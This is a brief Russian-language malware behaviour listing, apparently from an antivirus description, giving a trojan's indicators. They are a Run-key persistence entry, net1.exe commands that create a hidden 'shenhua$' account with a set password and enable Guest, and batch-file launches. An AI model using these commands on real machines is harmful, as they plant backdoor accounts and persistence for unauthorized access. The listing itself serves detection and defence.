Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ctfmons.exe' = 'C:\WINNT\system\ctfmons.exe'
- <SYSTEM32>\net1.exe localgroup %USERNAME%s Guest /add
- <SYSTEM32>\net1.exe user shenhua$ !!!@@@QQQaaa /ad
- <SYSTEM32>\net1.exe localgroup %USERNAME%s shenhua$ /ad
- <SYSTEM32>\cmd.exe /c ""<Текущая директория>\kill.bat""
- <SYSTEM32>\cmd.exe /c "C:\Documents and Settings\admin.bat"
- <SYSTEM32>\net1.exe user Guest /active:yes
- <SYSTEM32>\net1.exe user Guest !!!@@@QQQaaa /add
- <Текущая директория>\kill.bat
- C:\Documents and Settings\admin.bat